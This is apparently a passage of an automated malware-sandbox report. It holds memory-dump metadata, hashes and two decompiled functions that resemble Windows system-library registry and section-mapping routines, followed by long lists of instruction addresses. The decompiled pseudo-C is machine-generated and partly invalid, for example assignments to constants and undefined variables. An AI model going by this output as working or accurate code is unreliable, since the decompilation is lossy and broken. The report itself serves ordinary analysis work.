                                                                                                                                0x04f56df7
                                                                                                                                0x04f56dfd
                                                                                                                                0x04f56e01
                                                                                                                                0x04f56e05
                                                                                                                                0x04f56e09
                                                                                                                                0x04f56e0d
                                                                                                                                0x04f56e11
                                                                                                                                0x04f56e11
                                                                                                                                0x04f151eb
                                                                                                                                0x04f56e1a
                                                                                                                                0x04f56e1f
                                                                                                                                0x04f56e21
                                                                                                                                0x04f56e23
                                                                                                                                0x00000000
                                                                                                                                0x04f151f1
                                                                                                                                0x04f151f1
                                                                                                                                0x00000000
                                                                                                                                0x04f151f1

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0ee4b61245fd2868aebcc1edcaa00c84919838f5c7dcb99d0e3fd889bd54cf91
                                                                                                                                • Instruction ID: baf6c69bf1deab7c944c763c4b4a8898b855d33ebc8bf3586d30afed016bb9f6
                                                                                                                                • Opcode Fuzzy Hash: 0ee4b61245fd2868aebcc1edcaa00c84919838f5c7dcb99d0e3fd889bd54cf91
                                                                                                                                • Instruction Fuzzy Hash: 5CC113759093809FE354CF28C580A5AFBF1BF88308F54496EF9998B362D771E946CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F103E2, Relevance: .3, Instructions: 254COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 74%
                                                                                                                                			E04F103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x4fdd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04F10548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E04F2B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04EFB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x4fd7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04F07D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04F07D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E04F67016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E04F29830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E04F669A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x4fd7c04 != 0) {
						_t118 = _v12;
						_t120 = E04F6A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x4fd7bd8;
						if( *0x4fd7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E04F295D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E04F299A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E04F63540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04EEB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E04F2AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x4fd8474 - 3;
										if( *0x4fd8474 != 3) {
											 *0x4fd79dc =  *0x4fd79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04F07D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04F07D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E04F67016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x4fd8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x4fd7b00; // 0x0
							asm("ror esi, cl");
							 *0x4fdb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E04F295D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04EF7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                                                                                0x04f103f1
                                                                                                                                0x04f103f7
                                                                                                                                0x04f103f9
                                                                                                                                0x04f103fb
                                                                                                                                0x04f103fd
                                                                                                                                0x04f10400
                                                                                                                                0x04f1040a
                                                                                                                                0x04f54c7a
                                                                                                                                0x04f10537
                                                                                                                                0x04f10547
                                                                                                                                0x04f10410
                                                                                                                                0x04f10410
                                                                                                                                0x04f10414
                                                                                                                                0x04f10417
                                                                                                                                0x04f1041a
                                                                                                                                0x04f10421
                                                                                                                                0x04f10424
                                                                                                                                0x04f1042b
                                                                                                                                0x04f1043b
                                                                                                                                0x04f1043e
                                                                                                                                0x04f1043f
                                                                                                                                0x04f1043f
                                                                                                                                0x04f10446
                                                                                                                                0x04f10449
                                                                                                                                0x04f1044c
                                                                                                                                0x04f1044f
                                                                                                                                0x04f10459
                                                                                                                                0x04f54c8d
                                                                                                                                0x04f1045f
                                                                                                                                0x04f1045f
                                                                                                                                0x04f1045f
                                                                                                                                0x04f10467
                                                                                                                                0x04f54c97
                                                                                                                                0x04f54c9d
                                                                                                                                0x04f54ca4
                                                                                                                                0x04f54caa
                                                                                                                                0x04f54caf
                                                                                                                                0x04f54cb1
                                                                                                                                0x04f54cc3
                                                                                                                                0x04f54cb3
                                                                                                                                0x04f54cbc
                                                                                                                                0x04f54cbc
                                                                                                                                0x04f54cc8
                                                                                                                                0x04f54ccb
                                                                                                                                0x04f54cd7
                                                                                                                                0x04f54cda
                                                                                                                                0x04f54cdf
                                                                                                                                0x04f54cdf
                                                                                                                                0x04f54ccb
                                                                                                                                0x04f54ca4
                                                                                                                                0x04f1046d
                                                                                                                                0x04f1046f
                                                                                                                                0x04f1046f
                                                                                                                                0x04f10471
                                                                                                                                0x04f10476
                                                                                                                                0x04f1047a
                                                                                                                                0x04f1047b
                                                                                                                                0x04f10483
                                                                                                                                0x04f10489
                                                                                                                                0x04f1048d
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54ce9
                                                                                                                                0x04f54cef
                                                                                                                                0x04f54d22
                                                                                                                                0x04f54d22
                                                                                                                                0x00000000
                                                                                                                                0x04f54d22
                                                                                                                                0x04f54cf1
                                                                                                                                0x04f54cf7
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54cf9
                                                                                                                                0x04f54cff
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54d05
                                                                                                                                0x04f54d07
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54d0d
                                                                                                                                0x04f54d0f
                                                                                                                                0x04f54d14
                                                                                                                                0x04f54d16
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54d1c
                                                                                                                                0x04f54d1c
                                                                                                                                0x04f10499
                                                                                                                                0x04f10535
                                                                                                                                0x04f10535
                                                                                                                                0x00000000
                                                                                                                                0x04f10535
                                                                                                                                0x04f104a6
                                                                                                                                0x04f54d2c
                                                                                                                                0x04f54d37
                                                                                                                                0x04f54d39
                                                                                                                                0x04f54d3b
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54d41
                                                                                                                                0x04f54d48
                                                                                                                                0x04f10527
                                                                                                                                0x04f1052b
                                                                                                                                0x04f1052d
                                                                                                                                0x04f10530
                                                                                                                                0x04f10530
                                                                                                                                0x00000000
                                                                                                                                0x04f1052b
                                                                                                                                0x04f54d4e
                                                                                                                                0x04f104ac
                                                                                                                                0x04f104ac
                                                                                                                                0x04f104af
                                                                                                                                0x04f104b2
                                                                                                                                0x04f104b7
                                                                                                                                0x04f104b9
                                                                                                                                0x04f104bb
                                                                                                                                0x04f104bd
                                                                                                                                0x04f104bf
                                                                                                                                0x04f104c5
                                                                                                                                0x04f104c9
                                                                                                                                0x04f54d53
                                                                                                                                0x04f54d59
                                                                                                                                0x04f54db9
                                                                                                                                0x04f54dba
                                                                                                                                0x04f54dbf
                                                                                                                                0x04f54dc2
                                                                                                                                0x04f54dc4
                                                                                                                                0x04f54dc7
                                                                                                                                0x04f54dce
                                                                                                                                0x00000000
                                                                                                                                0x04f54dce
                                                                                                                                0x04f54d5b
                                                                                                                                0x04f54d61
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54d63
                                                                                                                                0x04f54d69
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54d6b
                                                                                                                                0x04f54d6e
                                                                                                                                0x04f54d74
                                                                                                                                0x04f54d76
                                                                                                                                0x04f54d7c
                                                                                                                                0x04f54d7e
                                                                                                                                0x04f54d84
                                                                                                                                0x04f54d89
                                                                                                                                0x04f54d8c
                                                                                                                                0x04f54d8d
                                                                                                                                0x04f54d92
                                                                                                                                0x04f54d95
                                                                                                                                0x04f54d96
                                                                                                                                0x04f54d98
                                                                                                                                0x04f54d9a
                                                                                                                                0x04f54d9f
                                                                                                                                0x04f54da4
                                                                                                                                0x04f54da6
                                                                                                                                0x04f54da8
                                                                                                                                0x04f54daf
                                                                                                                                0x04f54db1
                                                                                                                                0x04f54db1
                                                                                                                                0x04f54daf
                                                                                                                                0x04f54da6
                                                                                                                                0x04f54d84
                                                                                                                                0x04f54d7c
                                                                                                                                0x00000000
                                                                                                                                0x04f54d74
                                                                                                                                0x04f104d6
                                                                                                                                0x04f54de1
                                                                                                                                0x04f104dc
                                                                                                                                0x04f104dc
                                                                                                                                0x04f104dc
                                                                                                                                0x04f104e4
                                                                                                                                0x04f54deb
                                                                                                                                0x04f54df1
                                                                                                                                0x04f54df8
                                                                                                                                0x04f54dfe
                                                                                                                                0x04f54e03
                                                                                                                                0x04f54e05
                                                                                                                                0x04f54e17
                                                                                                                                0x04f54e07
                                                                                                                                0x04f54e10
                                                                                                                                0x04f54e10
                                                                                                                                0x04f54e1c
                                                                                                                                0x04f54e1f
                                                                                                                                0x04f54e35
                                                                                                                                0x04f54e35
                                                                                                                                0x04f54e1f
                                                                                                                                0x04f54df8
                                                                                                                                0x04f104f1
                                                                                                                                0x04f104fa
                                                                                                                                0x04f54e3f
                                                                                                                                0x04f54e47
                                                                                                                                0x04f54e5b
                                                                                                                                0x04f54e61
                                                                                                                                0x04f54e67
                                                                                                                                0x04f54e69
                                                                                                                                0x04f54e71
                                                                                                                                0x04f54e73
                                                                                                                                0x04f10500
                                                                                                                                0x04f10500
                                                                                                                                0x04f10500
                                                                                                                                0x04f104fa
                                                                                                                                0x04f10508
                                                                                                                                0x04f1051d
                                                                                                                                0x04f1051d
                                                                                                                                0x04f1051f
                                                                                                                                0x04f10524
                                                                                                                                0x00000000
                                                                                                                                0x04f10524
                                                                                                                                0x04f10515
                                                                                                                                0x04f10517
                                                                                                                                0x04f54e7a
                                                                                                                                0x04f54e7c
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f54e85
                                                                                                                                0x00000000
                                                                                                                                0x04f54e85
                                                                                                                                0x00000000
                                                                                                                                0x04f10517

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 31a270862114504a2cc31be8f32113e14a7d09c19247f927ea5346046002f49a
                                                                                                                                • Instruction ID: 784e145ba7e986fcbdbfa8027dbe7cf229936cf8fa2917b739d42085fe3a74db
                                                                                                                                • Opcode Fuzzy Hash: 31a270862114504a2cc31be8f32113e14a7d09c19247f927ea5346046002f49a
                                                                                                                                • Instruction Fuzzy Hash: A291E931F00218AFEB219B68CC44BAE77A5EB45714F050265EE11AB6F1EB74BD82C791
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EEC600, Relevance: .2, Instructions: 225COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 67%
                                                                                                                                			E04EEC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x4fdd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04EF6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E04F2B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4fd7b9c; // 0x0
					_t74 = L04F04620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04F29650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L04F077F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E04F2F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E04F213C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L04F077F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04F29650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                                                                                                                0x04eec608
                                                                                                                                0x04eec615
                                                                                                                                0x04eec625
                                                                                                                                0x04eec62d
                                                                                                                                0x04eec635
                                                                                                                                0x04eec640
                                                                                                                                0x04eec680
                                                                                                                                0x04eec687
                                                                                                                                0x04eec688
                                                                                                                                0x04eec689
                                                                                                                                0x04eec694
                                                                                                                                0x04eec694
                                                                                                                                0x04eec642
                                                                                                                                0x04eec64a
                                                                                                                                0x04eec697
                                                                                                                                0x04f57a25
                                                                                                                                0x04f57a2b
                                                                                                                                0x04f57a2e
                                                                                                                                0x04f57a30
                                                                                                                                0x04f57bea
                                                                                                                                0x04f57bea
                                                                                                                                0x00000000
                                                                                                                                0x04f57bea
                                                                                                                                0x04f57a36
                                                                                                                                0x04f57a43
                                                                                                                                0x04f57a48
                                                                                                                                0x04f57a4c
                                                                                                                                0x04f57a4e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57a58
                                                                                                                                0x04f57a5a
                                                                                                                                0x04f57a5b
                                                                                                                                0x04f57a5c
                                                                                                                                0x04f57a5d
                                                                                                                                0x04f57a63
                                                                                                                                0x04f57a64
                                                                                                                                0x04f57a6a
                                                                                                                                0x04f57a6c
                                                                                                                                0x04f57a6e
                                                                                                                                0x04f579cb
                                                                                                                                0x04f579cb
                                                                                                                                0x04f579ce
                                                                                                                                0x04f579d0
                                                                                                                                0x04f57a98
                                                                                                                                0x04f57a9b
                                                                                                                                0x04f57a9b
                                                                                                                                0x04f57a9e
                                                                                                                                0x04f57aa1
                                                                                                                                0x04f57bbe
                                                                                                                                0x04f57bbe
                                                                                                                                0x04f57bc0
                                                                                                                                0x04f57be0
                                                                                                                                0x04f57be0
                                                                                                                                0x04f57a01
                                                                                                                                0x04f57a01
                                                                                                                                0x04f57a05
                                                                                                                                0x04f57a07
                                                                                                                                0x04f57a15
                                                                                                                                0x04f57a15
                                                                                                                                0x04f57a1a
                                                                                                                                0x00000000
                                                                                                                                0x04f57a1a
                                                                                                                                0x04f57bc2
                                                                                                                                0x04f57bc6
                                                                                                                                0x04f57bc9
                                                                                                                                0x04f57bcd
                                                                                                                                0x04f57bcf
                                                                                                                                0x04f579e6
                                                                                                                                0x04f579e6
                                                                                                                                0x04f579eb
                                                                                                                                0x04f579eb
                                                                                                                                0x04f579ef
                                                                                                                                0x04f579f1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f579f3
                                                                                                                                0x04f579f5
                                                                                                                                0x04f579ff
                                                                                                                                0x04f579ff
                                                                                                                                0x00000000
                                                                                                                                0x04f579ff
                                                                                                                                0x04f579f7
                                                                                                                                0x04f579fd
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f579fd
                                                                                                                                0x04f57bd5
                                                                                                                                0x04f57bd8
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57ba9
                                                                                                                                0x04f57bac
                                                                                                                                0x04f57bb0
                                                                                                                                0x04f57bb1
                                                                                                                                0x04f57bb1
                                                                                                                                0x04f57bb6
                                                                                                                                0x00000000
                                                                                                                                0x04f57bb6
                                                                                                                                0x04f57aa7
                                                                                                                                0x04f57aaa
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57ab2
                                                                                                                                0x04f57ab3
                                                                                                                                0x04f57ab5
                                                                                                                                0x04f57aec
                                                                                                                                0x04f57aef
                                                                                                                                0x04f57b25
                                                                                                                                0x04f57b28
                                                                                                                                0x04f57b62
                                                                                                                                0x04f57b64
                                                                                                                                0x04f57b8f
                                                                                                                                0x04f57b92
                                                                                                                                0x04f57b96
                                                                                                                                0x04f57b98
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57b9e
                                                                                                                                0x04f57b9f
                                                                                                                                0x04f57ba3
                                                                                                                                0x00000000
                                                                                                                                0x04f57ba3
                                                                                                                                0x04f57b66
                                                                                                                                0x04f57b68
                                                                                                                                0x04f57ae2
                                                                                                                                0x04f57ae2
                                                                                                                                0x00000000
                                                                                                                                0x04f57ae2
                                                                                                                                0x04f57b6e
                                                                                                                                0x04f57b72
                                                                                                                                0x04f57b75
                                                                                                                                0x04f57b81
                                                                                                                                0x04f57b85
                                                                                                                                0x04f57b87
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57b31
                                                                                                                                0x04f57b34
                                                                                                                                0x04f57b3c
                                                                                                                                0x04f57b45
                                                                                                                                0x04f57b46
                                                                                                                                0x04f57b4f
                                                                                                                                0x04f57b51
                                                                                                                                0x04f57b57
                                                                                                                                0x04f57b59
                                                                                                                                0x04f57b59
                                                                                                                                0x00000000
                                                                                                                                0x04f57b59
                                                                                                                                0x04f57b77
                                                                                                                                0x00000000
                                                                                                                                0x04f57b77
                                                                                                                                0x04f57b2a
                                                                                                                                0x00000000
                                                                                                                                0x04f57b2a
                                                                                                                                0x04f57af1
                                                                                                                                0x04f57af3
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57afb
                                                                                                                                0x04f57afc
                                                                                                                                0x04f57afe
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57b00
                                                                                                                                0x04f57b03
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57b05
                                                                                                                                0x04f57b09
                                                                                                                                0x04f57b0d
                                                                                                                                0x04f57b0f
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57b18
                                                                                                                                0x04f57b1d
                                                                                                                                0x00000000
                                                                                                                                0x04f57b1d
                                                                                                                                0x04f57ab7
                                                                                                                                0x04f57ab9
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57abf
                                                                                                                                0x04f57ac1
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57ac3
                                                                                                                                0x04f57ac6
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57ac8
                                                                                                                                0x04f57acc
                                                                                                                                0x04f57ad0
                                                                                                                                0x04f57ad2
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57adb
                                                                                                                                0x00000000
                                                                                                                                0x04f57adb
                                                                                                                                0x04f579d6
                                                                                                                                0x04f579d9
                                                                                                                                0x04f579dc
                                                                                                                                0x04f57a91
                                                                                                                                0x04f57a94
                                                                                                                                0x00000000
                                                                                                                                0x04f57a94
                                                                                                                                0x04f579e2
                                                                                                                                0x00000000
                                                                                                                                0x04f579e2
                                                                                                                                0x04f57a74
                                                                                                                                0x04f57a7a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f57a8a
                                                                                                                                0x04f57a21
